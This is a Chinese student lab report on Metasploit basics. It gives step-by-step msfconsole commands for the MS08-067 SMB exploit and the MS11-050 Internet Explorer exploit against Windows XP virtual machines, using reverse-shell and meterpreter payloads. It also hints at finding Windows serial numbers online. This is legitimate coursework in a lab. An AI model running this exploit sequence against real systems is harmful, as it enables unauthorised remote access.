20155305《网络对抗》MSF基础应用
实验过程
实验系统
- 靶机1:Windows XP Professional SP2 ,IP地址:192.168.1.108
- 靶机2:Windows XP Professional SP3 简体中文,IP地址:192.168.1.113
- windows XP的虚拟机安装可以在这个网址下载iso镜像,至于序列号就百度吧,会有很多。
- Kali IP地址:192.168.1.105
1、主动攻击:ms08_067
- 使用靶机1和Kali
先
msfconsole
进入msf,再用search ms08_067
查询一下针对该漏洞的攻击模块:
- 用
use exploit/windows/smb/ms08_067_netapi
使用该模块:
- 用
show targets
查看可以被攻击的靶机的操作系统型号:
- 用
show payloads
查看可以供我们使用的攻击载荷:
- 从中找到一个可用的攻击载荷
generic/shell_reverse_tcp
,用set payload generic/shell_reverse_tcp
设置payload:
- 用
show options
查看需要设置的参数:
- 这里需要设置RHOST(靶机IP)和LHOST(Kali的IP),使用
set 需设置的参数名 参数值
命令即可设置:
- 设置target选项目标(例如我攻击系统为WIN xp 中文简体 SP2,所以选择10)
- 用
show options
确认需要设置的参数是否已经设置好:
- 确认参数设置无误后,用
exploit
指令开始攻击:
- 攻击成功后会获取靶机的shell,可以对其进行操作:
2、针对浏览器的攻击:ms11_050
- 使用靶机2和Kali(一开始用自己的最后会有问题,所以换了老师之前的kali)
用search ms11_050
查询一下针对该漏洞的攻击模块,并用use windows/browser/ms11_050_mshtml_cobjectelement
使用该模块:
- 用
info
查看该模块的信息(这个指令相当于show targets
、show options
等的集合版):
基本信息:
- targets信息:
- options信息:
- 用
set payload windows/meterpreter/reverse_tcp
设置payload,并设置需要设置的参数。
用show options
确认需要设置的参数是否已经设置好:
- 确认参数设置无误后,用exploit指令开始攻击,攻击成功后会有靶机需要访问的网址:
- 在靶机IE上输入该网址:
- kali中显示session 1已经创建,并显示其会话ID:
原文地址:https://www.cnblogs.com/20155305ql/p/8820504.html
时间: 2024-10-12 12:59:30